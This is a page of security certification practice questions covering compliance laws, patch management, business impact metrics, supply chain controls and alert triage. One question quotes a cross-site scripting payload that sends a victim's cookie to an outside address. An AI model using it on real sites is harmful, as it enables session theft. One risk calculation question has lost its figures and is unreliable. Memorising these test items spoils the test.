Tüm alıştırma soruları
2232 soru
A regional hospital system in the United States is revising its security procedures for storing and transmitting electronic patient medical records. Which of the following laws specifically mandates the privacy and security standards required for Protected Health Information (PHI)?
A security operations team is establishing a standardized patch management workflow to ensure system security while minimizing operational disruption across the enterprise. Place the steps of the enterprise patch management lifecycle in the correct procedural sequence from initial identification to post-implementation audit.
Öğeleri doğru sıraya koymak için sürükleyin
A security engineer is planning a vulnerability assessment for an enterprise network segment containing legacy operational technology (OT) devices. These endpoints are highly sensitive to network traffic volume and frequently crash when subjected to active service probing or rapid port sweeps. The engineer must obtain a detailed inventory of missing security patches and system misconfigurations without causing service outages or operational downtime. Which of the following approaches should the engineer implement?
A retail business operating in the European Union accepts online credit card payments from local customers. The security team must update company policies to maintain compliance when handling customer payment card details and personal billing addresses. Which of the following compliance frameworks directly govern the security and privacy of these data types? (Select TWO.)
Geçerli olan tümünü seçin
An enterprise data center hosts a critical database server with an estimated Asset Value () of . Historical threat data indicates that power surge events occur once every 4 years (), with each unmitigated event carrying an Exposure Factor () of . To mitigate this risk, the organization installs an industrial surge protection system that reduces the Exposure Factor to , without altering the frequency of occurrence. What is the new Annualized Loss Expectancy (), in dollars, after implementing this control?
A security operations manager is updating operational procedures for vulnerability assessments across an enterprise network. Match each assessment methodology with the scenario where it is most appropriately applied.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
An enterprise security analyst discovers that routine software vendor patches regularly overwrite customized security hardening settings on production Linux servers, resetting critical system configurations to insecure defaults. Which of the following patch and configuration management solutions best prevents configuration drift while ensuring ongoing security baseline compliance after patch deployment?
An organization's security team is conducting a Business Impact Analysis (BIA) to establish operational recovery requirements for a customer portal database. Which of the following statements accurately describe the metrics used in this analysis? (Select TWO.)
Geçerli olan tümünü seçin
An enterprise financial organization is auditing its software vendors' supply chain risk management practices. The security team needs to verify code integrity and ensure compromised third-party open-source dependencies are identified before being integrated into internal build pipelines. Which of the following technical controls or artifacts should the organization require vendors to provide? (Select TWO.)
Geçerli olan tümünü seçin
An organization is updating its enterprise access control policy to comply with strict security standards. Match each operational security task to the corresponding AAA (Authentication, Authorization, and Accounting) or Identification function it represents.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
An enterprise organization is procuring core networking hardware from an external supplier to deploy in a high-security data center. The security team wants to prevent threat actors from intercepting the physical shipment to install malicious microcode or physical implants during transit. Which supply chain security control should the organization mandate to address this specific risk?
Following an assessment of remote access risks, a network administrator mandates that all system administrators must use hardware security keys to perform multi-factor authentication when logging into administrative portals. Which of the following combinations correctly identifies the control category and functional control type of the hardware security keys?
An organization is enhancing its vendor governance framework to address distinct third-party operational and supply chain security risks. Match each risk assessment artifact or agreement on the left to its corresponding enterprise application on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
A lead security architect is designing an automated archival service for high-throughput system audit logs stored at rest. The security policy mandates strong bulk data confidentiality and authenticated integrity while minimizing computational latency for multi-gigabyte log archives. Which of the following cryptographic mechanisms best fulfills these requirements?
A global pharmaceutical corporation established an executive directive requiring all public-facing services to enforce robust transport layer security. To support this requirement, system administrators need specific, step-by-step operational instructions for configuring web server software to disable legacy protocols and enable approved cipher suites. Which of the following governance document types should the operations team create to fulfill this requirement?
Match each business continuity and Business Impact Analysis (BIA) metric with its corresponding operational definition.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
While analyzing alerts from a network intrusion detection system (NIDS) monitoring outbound perimeter traffic, a security administrator notices an alert flagged as a high-severity SQL injection payload against an enterprise web application server. The packet log payload reads:
`GET /comment.php?id=101&data=<script>document.location='http://192.0.2.55/collect?cookie='+document.cookie</script> HTTP/1.1`
Which of the following represents the most accurate evaluation of this network alert?
A Security Operations Center (SOC) receives an automated alert generated by a Network Intrusion Prevention System (NIPS) detecting an remote code execution (RCE) payload targeted at an internal API server. In what chronological sequence should a security analyst perform the initial response actions from alert ingestion through recovery?
Öğeleri doğru sıraya koymak için sürükleyin
A healthcare organization specifies that its critical Electronic Health Record (EHR) database cannot be offline for longer than four hours in total before severe operational disruption and patient care risks occur. Which of the following business continuity metrics represents this total maximum allowable outage timeframe?
A security team is experiencing severe performance degradation on production database servers whenever network-based vulnerability scans occur. The team must maintain comprehensive vulnerability visibility while eliminating operational disruption to high-traffic database services. Which of the following strategies should the security team implement to resolve this issue? (Select TWO.)
Geçerli olan tümünü seçin